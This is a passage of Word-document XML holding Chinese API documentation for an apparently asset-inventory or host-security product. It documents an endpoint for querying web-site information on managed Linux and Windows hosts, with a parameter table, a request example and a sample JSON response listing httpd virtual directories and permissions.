        <w:t>用于查询web站点信息；每条数据均包含主机信息，您可以灵活的使用该接口组合出任何需要的显示结果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EFB515D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>功能描述</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A6D2D7C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>该功能API用于查询资产中的web站点信息，获取查询的结果并展示；每条数据均包含主机信息，您可以灵活的使用该API组合出任何需要的显示结果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3976B993" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>功能使用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ABA19D7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>web站点信息查询有两种方式：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="707E13FC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>直接获取当前信息；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD1A44F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>更新数据后，再获取最新信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1899249F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>为了满足上述功能，我们提供了三个接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="461EAAE6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>web站点信息查询结果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="218F09CE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>web站点信息扫描</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0777EBEC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>web站点信息查询扫描状态</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA2662C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>使用方法如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57366A9E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>直接查询当前信息则直接调用web站点信息查询结果接口（即1号接口）；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA517EC"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2193A17C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>接口的调用方法、参数和返回信息等具体如下所示。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A6E957" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="41" w:name="web站点信息查询结果"/>
      <w:r>
        <w:t>web站点信息查询结果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19527989" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>该接口用于查询web站点信息，按每台主机每个用户组进行展示。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C0D48D3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74AF8823" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/api/assets/website/{linux|win}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D069D7B"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173"/>
        <w:gridCol w:w="1339"/>
        <w:gridCol w:w="630"/>
        <w:gridCol w:w="3471"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="521EF9B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1D4276A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="52F8DC08" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="301E0689" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0AED7144" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="75ECCFEC" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="095EF4A5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1ADC0787" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0619989E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1F009F52" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>唯一标识Agent的ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="77BCD3AE" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="18F18759" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>groups</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="04E2297E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="735E772D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0A0EE03A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1B4D85B8" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2211A669" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1A29C8B6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5005BB4B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="06EF0989" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机名（模糊查询）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5D45077F" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="080F991F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>ip</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5971F35B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0391D3A3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0C70C512" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机IP（模糊查询）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7C35131F" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3C3D89AD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>port</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1FD772F6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="27621B4A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="79BDAA24" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>站点端口</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5B79A396" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1B2B89C5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>proto</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="705107A1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F9EAD1D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="356414AB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>站点协议，精确匹配</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7B297AAD" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6485858F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7161B782" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4CC9DA08" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="76BE3CA5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>服务类型，精确匹配，如iis,nginx等</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="409F8FB3" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="01543F0E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>rootPath</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1803A779" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5F3C86F3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3012143F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>站点路径，模糊匹配</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4458A590" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D44F7F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/api/assets/website/linux?agentId=70db8ef89e9ae79a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46FA67DE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F6F9A5A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>"total":1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "rows": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "agentId": "c0bb1116dfa69772",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            "displayIp": "192.168.202.147",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "connectionIp": "192.168.199.16",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "externalIp": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "internalIp": "192.168.202.147",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "bizGroupId": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "bizGroup": "未分组主机（Linux）",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "remark": "测试接口哦哦11哦",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "hostTagList": [],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "hostname": "localhost.localdomain",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "type": "httpd",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "port": 80,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "portStatus": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "securityEnabled": false,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "allow": "all",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "deny": "",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "proto": "http",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "domains": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "name": "*",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "title": "",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "ip": ""</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "virtualDir": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "path": "",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "physicalPath": "/var/www/html",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "owner": "root",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "group": "root",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "permission": "rwxr-xr-x",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "ownerType": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "acls": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "appPath": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "appPool": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "root": true</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "path": "/icons/",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "physicalPath": "/var/www/icons/",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "owner": "root",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "group": "root",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "permission": "rwxr-xr-x",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "ownerType": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "acls": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "appPath": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "appPool": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "root": false</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                },</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "path": "/cgi-bin/",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "physicalPath": "/var/www/cgi-bin/",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "owner": "root",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "group": "root",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "permission": "rwxr-xr-x",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "ownerType": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "acls": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "appPath": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "appPool": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "root": false</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "path": "/error/",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "physicalPath": "/var/www/error/",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "owner": "root",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "group": "root",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "permission": "rwxr-xr-x",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "ownerType": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "acls": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "appPath": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "appPool": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "root": false</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "root": {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "path": "",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "physicalPath": "/var/www/html",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "owner": "root",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "group": "root",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "permission": "rwxr-xr-x",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "ownerType": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "acls": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "appPath": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "appPool": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "root": true</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "virtualDirCount": 4,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "pid": 3013,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "user": "apache",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "name": "httpd",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "cmd": "/usr/sbin/httpd ",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "configName": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "state": 0,</w:t>
